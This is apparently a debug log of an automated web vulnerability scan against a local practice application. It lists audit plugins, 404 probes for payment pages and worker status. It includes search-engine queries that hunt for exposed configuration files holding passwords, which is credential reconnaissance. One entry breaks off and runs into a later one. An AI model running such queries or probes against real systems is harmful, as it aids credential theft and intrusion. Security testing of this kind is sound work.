[Wed Feb 12 09:38:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:TS3QJaAO) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/includes/paid.py returned HTTP code "404" (id=1137,from_cache=0,grep=1,rtt=0.44,did=IXbY9pkj) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/module/successful.jsp returned HTTP code "404" (id=1131,from_cache=0,grep=1,rtt=0.13,did=omsan8tB) [Wed Feb 12 09:38:02 2020 - debug] GET http://localhost:9090/inc/success.py returned HTTP code "404" (id=1136,from_cache=0,grep=1,rtt=0.14,did=U7DxbRyW) [Wed Feb 12 09:38:02 2020 - debug] POST http://localhost:9090/includes/validpay.jsp returned HTTP code "404" (id=1140,from_cache=0,grep=1,rtt=0.11,did=o7sPcCD7) [Wed Feb 12 09:38:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] GET http://localhost:9090/module/final.aspx returned HTTP code "404" (id=1141,from_cache=0,grep=1,rtt=0.17,did=lQ0dnz18) [Wed Feb 12 09:38:03 2020 - debug] lfi.audit(did="TdDq5lOw", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:TdDq5lOw) [Wed Feb 12 09:38:03 2020 - debug] deserialization.audit(did="tx8rmjdH",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.21s to run [Wed Feb 12 09:38:03 2020 - debug] sqli.audit(did="lmGgYxe7", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:lmGgYxe7) [Wed Feb 12 09:38:03 2020 - debug] GET http://localhost:9090/includes/pay.pl returned HTTP code "404" (id=1145,from_cache=0,grep=1,rtt=0.25,did=ZMLyeXoB) [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] GET http://localhost:9090/servlet/valid.pl returned HTTP code "404" (id=1139,from_cache=0,grep=1,rtt=0.37,did=kXLUzSg1) [Wed Feb 12 09:38:03 2020 - debug] POST http://localhost:9090/modules/trxcomplete.jsp returned HTTP code "404" (id=1144,from_cache=0,grep=1,rtt=0.26,did=wyVUr4yi) [Wed Feb 12 09:38:03 2020 - debug] POST http://localhost:9090/includes/transactioncomplete.jsp returned HTTP code "404" (id=1147,from_cache=0,grep=1,rtt=0.50,did=G4HfWMTC) [Wed Feb 12 09:38:03 2020 - debug] GET http://localhost:9090/modules/finished.pl returned HTTP code "404" (id=1142,from_cache=0,grep=1,rtt=0.28,did=6qLcRiH7) [Wed Feb 12 09:38:03 2020 - debug] os_commanding.audit(did="TS3QJaAO",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.29s to run [Wed Feb 12 09:38:03 2020 - debug] lfi.audit(did="TdDq5lOw",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.10s to run [Wed Feb 12 09:38:03 2020 - debug] blind_sqli.audit(did="9Xq0JWEx", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] GET http://www.google.com/search?q=site:localhost inurl:zebra.conf intext:password -sample -test -tutorial -download&start=0&sa=N&hl=en returned HTTP code "200" (id=1146,from_cache=0,grep=1,rtt=0.78,did=jLRqCCjY) [Wed Feb 12 09:38:03 2020 - debug] sqli.audit(did="lmGgYxe7",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.17s to run [Wed Feb 12 09:38:03 2020 - debug] POST http://localhost:9090/includes/completepayment.pl returned HTTP code "404" (id=1148,from_cache=0,grep=1,rtt=0.09,did=jDR2EbUv) [Wed Feb 12 09:38:03 2020 - debug] phishing_vector.audit(did="R2lfJKJ3", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:R2lfJKJ3) [Wed Feb 12 09:38:03 2020 - debug] POST http://localhost:9090/inc/paid.pl returned HTTP code "404" (id=1153,from_cache=0,grep=1,rtt=0.27,did=73mZgD8a) [Wed Feb 12 09:38:03 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 137. [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] blind_sqli.audit(did="9Xq0JWEx",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.11s to run [Wed Feb 12 09:38:03 2020 - debug] Finished audit.phishing_vector (did=R2lfJKJ3) [Wed Feb 12 09:38:03 2020 - debug] phishing_vector.audit(did="R2lfJKJ3",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.04s to run [Wed Feb 12 09:38:03 2020 - debug] Google search for: 'site:localhost inurl:zebra.conf intext:password -sample -test -tutorial -download' returned 0 unique results [Wed Feb 12 09:38:03 2020 - debug] generic.audit(did="51u68ex7", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] generic.audit(did="51u68ex7",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.00s to run [Wed Feb 12 09:38:03 2020 - debug] format_string.audit(did="X2rkfnI4", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:X2rkfnI4) [Wed Feb 12 09:38:03 2020 - debug] format_string.audit(did="X2rkfnI4",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.02s to run [Wed Feb 12 09:38:03 2020 - debug] GET http://localhost:9090/inc/validpay.aspx returned HTTP code "404" (id=1143,from_cache=0,grep=1,rtt=0.18,did=HR1qmKpJ) [Wed Feb 12 09:38:03 2020 - debug] http_in_body.grep(uri="http://localhost:9090/DMIoG") took 3.93s to run [Wed Feb 12 09:38:03 2020 - debug] GET http://localhost:9090/inc/valid.py returned HTTP code "404" (id=1151,from_cache=0,grep=1,rtt=0.28,did=he1tKpnw) [Wed Feb 12 09:38:03 2020 - debug] url_session.grep(uri="http://localhost:9090/DMIoG") took 3.38s to run [Wed Feb 12 09:38:03 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:38:03 2020 - debug] html_comments.grep(uri="http://localhost:9090/DMIoG") took 3.56s to run [Wed Feb 12 09:38:03 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/DMIoG") took 3.57s to run [Wed Feb 12 09:38:03 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/DMIoG") took 3.53s to run [Wed Feb 12 09:38:03 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/DMIoG") took 3.53s to run [Wed Feb 12 09:38:03 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/DMIoG") took 3.58s to run [Wed Feb 12 09:38:04 2020 - debug] POST http://localhost:9090/module/completepay.pl returned HTTP code "404" (id=1149,from_cache=0,grep=1,rtt=0.16,did=LbWKIIWz) [Wed Feb 12 09:38:04 2020 - debug] GET http://localhost:9090/modules/validation.pl returned HTTP code "404" (id=1154,from_cache=0,grep=1,rtt=0.11,did=Jt9G0ypi) [Wed Feb 12 09:38:04 2020 - debug] GET http://localhost:9090/servlet/validation.jsp returned HTTP code "404" (id=1150,from_cache=0,grep=1,rtt=0.14,did=9HopnOv2) [Wed Feb 12 09:38:04 2020 - debug] POST http://localhost:9090/modules/complete.jsp returned HTTP code "404" (id=1152,from_cache=0,grep=1,rtt=0.28,did=LugXim6H) [Wed Feb 12 09:38:04 2020 - debug] GET http://localhost:9090/servlet/success.pl returned HTTP code "404" (id=1155,from_cache=0,grep=1,rtt=0.12,did=ZGnjDPzr) [Wed Feb 12 09:38:04 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 138. [Wed Feb 12 09:38:04 2020 - debug] GET http://localhost:9090/module/paymentsuccessful.jsp returned HTTP code "404" (id=1156,from_cache=0,grep=1,rtt=0.09,did=lRuXZ8Fu) [Wed Feb 12 09:38:04 2020 - debug] websocket_hijacking.audit(did="8YKAZR7K", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:04 2020 - debug] websocket_hijacking.audit(did="8YKAZR7K",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.08s to run [Wed Feb 12 09:38:04 2020 - debug] shell_shock.audit(did="Ao4zD4Cf", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:04 2020 - debug] GET http://localhost:9090/servlet/validatepayment.jsp returned HTTP code "404" (id=1158,from_cache=0,grep=1,rtt=0.20,did=eYr45gXh) [Wed Feb 12 09:38:04 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 139. [Wed Feb 12 09:38:04 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 140. [Wed Feb 12 09:38:04 2020 - debug] memcachei.audit(did="wcoxqWAM", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:04 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:04 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:wcoxqWAM) [Wed Feb 12 09:38:04 2020 - debug] symfony.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] POST http://localhost:9090/inc/success.jsp returned HTTP code "404" (id=1157,from_cache=0,grep=1,rtt=0.19,did=GZD2lS2U) [Wed Feb 12 09:38:04 2020 - debug] svn_users.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] private_ip.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] memcachei.audit(did="wcoxqWAM",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.05s to run [Wed Feb 12 09:38:04 2020 - debug] expect_ct.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] POST http://localhost:9090/includes/paid.jsp returned HTTP code "404" (id=1159,from_cache=0,grep=1,rtt=0.38,did=F3dSJcay) [Wed Feb 12 09:38:04 2020 - debug] un_ssl.audit(did="rx54Bdw0", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:04 2020 - debug] un_ssl.audit(did="rx54Bdw0",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] POST http://localhost:9090/includes/pay.php3 returned HTTP code "404" (id=1160,from_cache=0,grep=1,rtt=0.27,did=awTMTZrK) [Wed Feb 12 09:38:04 2020 - debug] file_upload.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] motw.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] meta_generator.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] retirejs.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] serialized_object.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] blank_body.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] credit_cards.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] websockets_links.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] csp.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] dom_xss.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:3 / max:50 / total:53) [Wed Feb 12 09:38:04 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.30 sec) (084f56a9dda1c119, 0.06 sec) (20c6fb7a85d275d0, 0.06 sec) [Wed Feb 12 09:38:04 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 141. [Wed Feb 12 09:38:04 2020 - debug] GET http://localhost:9090/modules/paymentcomplete.pl returned HTTP code "404" (id=1161,from_cache=0,grep=1,rtt=0.45,did=bgOAcC0I) [Wed Feb 12 09:38:04 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] keys.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] clamav.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] ldapi.audit(did="eR44OXrP", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:04 2020 - debug] buffer_overflow.audit(did="3sO9bdo4", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:04 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] objects.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] error_500.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] meta_tags.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] password_profiling.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] click_jacking.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:04 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/ntop/") took 0.01s to run [Wed Feb 12 09:38:04 2020 - debug] lang.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:05 2020 - debug] POST http://localhost:9090/modules/finished.php3 returned HTTP code "404" (id=1162,from_cache=0,grep=1,rtt=0.22,did=5cwWMK1i) [Wed Feb 12 09:38:05 2020 - debug] redos.audit(did="IWXcKqyb", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:05 2020 - debug] POST http://localhost:9090/module/final.pl returned HTTP code "404" (id=1164,from_cache=0,grep=1,rtt=0.13,did=xUjl3LYP) [Wed Feb 12 09:38:05 2020 - debug] POST http://localhost:9090/servlet/valid.php3 returned HTTP code "404" (id=1165,from_cache=0,grep=1,rtt=0.11,did=2eRCU9vL) [Wed Feb 12 09:38:05 2020 - debug] GET http://localhost:9090/module/paymentsuccess.jsp returned HTTP code "404" (id=1167,from_cache=0,grep=1,rtt=0.36,did=p7oXC9vg) [Wed Feb 12 09:38:05 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:05 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:05 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:eR44OXrP) [Wed Feb 12 09:38:05 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 142. [Wed Feb 12 09:38:05 2020 - debug] vulners_db.grep(uri="http://localhost:9090/ntop/") took 0.31s to run [Wed Feb 12 09:38:05 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/ntop/") took 0.00s to run [Wed Feb 12 09:38:05 2020 - debug] GET http://localhost:9090/module/successful.jsp returned HTTP code "404" (id=1166,from_cache=0,grep=1,rtt=0.17,did=eINDpyHp) [Wed Feb 12 09:38:05 2020 - debug] xpath.audit(did="kHx4LH5S", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:05 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:05 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:kHx4LH5S) [Wed Feb 12 09:38:05 2020 - debug] global_redirect.audit(did="S0SduGjU", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:05 2020 - debug] GET http://localhost:9090/modules/trxcomplete.jsp returned HTTP code "404" (id=1168,from_cache=0,grep=1,rtt=0.18,did=yhEP0Qqj) [Wed Feb 12 09:38:05 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:05 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:S0SduGjU) [Wed Feb 12 09:38:05 2020 - debug] buffer_overflow.audit(did="3sO9bdo4",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.50s to run [Wed Feb 12 09:38:05 2020 - debug] POST http://localhost:9090/servlet/validation.rb returned HTTP code "404" (id=1170,from_cache=0,grep=1,rtt=0.20,did=WIeYWmIn) [Wed Feb 12 09:38:05 2020 - debug] GET http://localhost:9090/servlet/finished.jsp returned HTTP code "404" (id=1163,from_cache=0,grep=1,rtt=0.17,did=3e9QOdWd) [Wed Feb 12 09:38:05 2020 - debug] POST http://localhost:9090/inc/valid.jsp returned HTTP code "404" (id=1171,from_cache=0,grep=1,rtt=0.16,did=7dZFE9qv) [Wed Feb 12 09:38:05 2020 - debug] http_in_body.grep(uri="http://localhost:9090/ntop/") took 0.92s to run [Wed Feb 12 09:38:06 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/ntop/") took 0.74s to run [Wed Feb 12 09:38:06 2020 - debug] POST http://localhost:9090/servlet/validatepayment.rb returned HTTP code "404" (id=1169,from_cache=0,grep=1,rtt=0.19,did=SHWzDrg9) [Wed Feb 12 09:38:06 2020 - debug] url_session.grep(uri="http://localhost:9090/ntop/") took 0.62s to run [Wed Feb 12 09:38:06 2020 - debug] cors_origin.audit(did="dyXDtEef", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:06 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/ntop/") took 0.83s to run [Wed Feb 12 09:38:06 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" () [Wed Feb 12 09:38:06 2020 - debug] error_pages.grep(uri="http://localhost:9090/ntop/") took 0.27s to run [Wed Feb 12 09:38:06 2020 - debug] ldapi.audit(did="eR44OXrP",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.80s to run [Wed Feb 12 09:38:06 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/ntop/") took 0.67s to run [Wed Feb 12 09:38:06 2020 - debug] html_comments.grep(uri="http://localhost:9090/ntop/") took 0.81s to run [Wed Feb 12 09:38:06 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/ntop/") took 0.77s to run [Wed Feb 12 09:38:06 2020 - debug] xpath.audit(did="kHx4LH5S",uri="http://localhost:9090/learn/vulnerability/a10_logging") took 0.27s to run [Wed Feb 12 09:38:06 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 143. [Wed Feb 12 09:38:06 2020 - debug] Worker with ID GrepWorker(0w4luJLJ) is idle. [Wed Feb 12 09:38:06 2020 - debug] Worker with ID GrepWorker(YkMMRUeq) is idle. [Wed Feb 12 09:38:06 2020 - debug] Worker with ID GrepWorker(XRNlNlu5) is idle. [Wed Feb 12 09:38:06 2020 - debug] Worker with ID GrepWorker(SyXCPA2t) is idle. [Wed Feb 12 09:38:06 2020 - debug] Worker with ID GrepWorker(2XKnj13Q) is idle. [Wed Feb 12 09:38:06 2020 - debug] Worker with ID GrepWorker(xNlctAVQ) is idle. [Wed Feb 12 09:38:06 2020 - debug] Worker with ID GrepWorker(qExgSbEO) is idle. [Wed Feb 12 09:38:06 2020 - debug] Worker with ID GrepWorker(MDWE44QH) is idle. [Wed Feb 12 09:38:06 2020 - debug] 80% of GrepWorker workers are idle. [Wed Feb 12 09:38:06 2020 - debug] GrepWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:38:06 2020 - debug] htaccess_methods.audit(did="zXK47Vxj", uri="http://localhost:9090/learn/vulnerability/a10_logging") [Wed Feb 12 09:38:06 2020 - debug] Worker with ID WorkerThread(eMhX1dy3) has been running job 1445 for 16.56 seconds. The job is: _send_requests(((, , , , , , , , , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(6gcxf74d) has been running job 532 for 29.27 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(NjMjnrCb) has been running job 627 for 17.58 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(SVfxFVXP) has been running job 54 for 62.92 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(br5sQhGq) has been running job 550 for 28.91 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(N5yqeDHB) has been running job 247 for 47.32 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(XyVz5jPE) has been running job 267 for 39.70 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(ubgDPgOi) has been running job 606 for 20.69 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(z6MGDQIP) has been running job 461 for 38.15 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] Worker with ID CrawlInfraWorker(1i39mCZz) has been running job 127 for 61.93 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:38:06 2020 - debug] 0% of CrawlInfraWorker workers are idle. [Wed Feb 12 09:38:06 2020 - debug] CrawlInfraWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:38:06 2020 - debug] CrawlInfraWorker worker pool has 99 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:38:06 2020 - debug] Worker with ID WorkerThread(lqDVDrY6) has been running job 1445 for 16.51 seconds. The job is: _send_requests(((, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , kwargs={}) [Wed Feb 12 09:39:12 2020 - debug] Worker with ID CrawlInfraWorker(6gcxf74d) has been running job 532 for 59.50 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:12 2020 - debug] Worker with ID CrawlInfraWorker(NjMjnrCb) has been running job 627 for 47.82 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:12 2020 - debug] Worker with ID CrawlInfraWorker(SVfxFVXP) has been running job 54 for 93.15 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:12 2020 - debug] Worker with ID CrawlInfraWorker(br5sQhGq) has been running job 550 for 59.15 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:12 2020 - debug] Worker with ID CrawlInfraWorker(N5yqeDHB) has been running job 247 for 77.55 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:12 2020 - debug] Worker with ID CrawlInfraWorker(XyVz5jPE) has been running job 267 for 69.93 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:13 2020 - debug] Worker with ID CrawlInfraWorker(ubgDPgOi) has been running job 606 for 50.92 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:13 2020 - debug] Worker with ID CrawlInfraWorker(z6MGDQIP) has been running job 628 for 21.77 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:13 2020 - debug] Worker with ID CrawlInfraWorker(1i39mCZz) has been running job 127 for 92.16 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:39:13 2020 - debug] 0% of CrawlInfraWorker workers are idle. [Wed Feb 12 09:39:13 2020 - debug] CrawlInfraWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:39:13 2020 - debug] CrawlInfraWorker worker pool has 99 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:39:13 2020 - debug] POST http://localhost:9090/inc/validatepay returned HTTP code "404" (id=1746,from_cache=0,grep=1,rtt=0.25,did=loMhd6B6) [Wed Feb 12 09:39:13 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 751, 'reject-seen-url': 578, 'reject-out-of-scope': 21, 'accept': 200} [Wed Feb 12 09:39:13 2020 - debug] Worker with ID WorkerThread(lqDVDrY6) has been running job 1445 for 46.84 seconds. The job is: _send_requests(((, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:25 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:25 2020 - debug] ssn.grep(uri="http://localhost:9090/localhost.tar.gz") took 0.00s to run [Wed Feb 12 09:40:26 2020 - debug] POST http://localhost:9090/inc/trxcomplete.aspx returned HTTP code "404" (id=2225,from_cache=0,grep=1,rtt=0.40,did=tI8Yfuoh) [Wed Feb 12 09:40:26 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:26 2020 - debug] POST http://localhost:9090/inc/validate.asp returned HTTP code "404" (id=2227,from_cache=0,grep=1,rtt=0.41,did=SEszb4f4) [Wed Feb 12 09:40:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 979, 'reject-seen-url': 815, 'reject-out-of-scope': 23, 'accept': 208} [Wed Feb 12 09:40:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 979, 'reject-seen-url': 815, 'reject-out-of-scope': 23, 'accept': 208} [Wed Feb 12 09:40:26 2020 - debug] GET http://ajax.googleapis.com/ajax/services/search/web?q=site:localhost cgiirc.conf&start=0&rsz=8&v=1.0 returned HTTP code "200" (id=2229,from_cache=0,grep=1,rtt=0.90,did=4zra3s3z) [Wed Feb 12 09:40:26 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/localhost.tar.gz") took 0.08s to run [Wed Feb 12 09:40:26 2020 - debug] GET http://localhost:9090/module/validpay.aspx returned HTTP code "404" (id=2230,from_cache=0,grep=1,rtt=0.13,did=Y556M0Su) [Wed Feb 12 09:40:26 2020 - debug] GET http://localhost:9090/inc/final.py returned HTTP code "404" (id=2217,from_cache=0,grep=1,rtt=0.36,did=M00ZJ2Zj) [Wed Feb 12 09:40:26 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:27 2020 - debug] POST http://localhost:9090/module/success.asp returned HTTP code "404" (id=2232,from_cache=0,grep=1,rtt=0.65,did=zR9zFpuD) [Wed Feb 12 09:40:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:27 2020 - debug] POST http://localhost:9090/servlet/completepay.pl returned HTTP code "404" 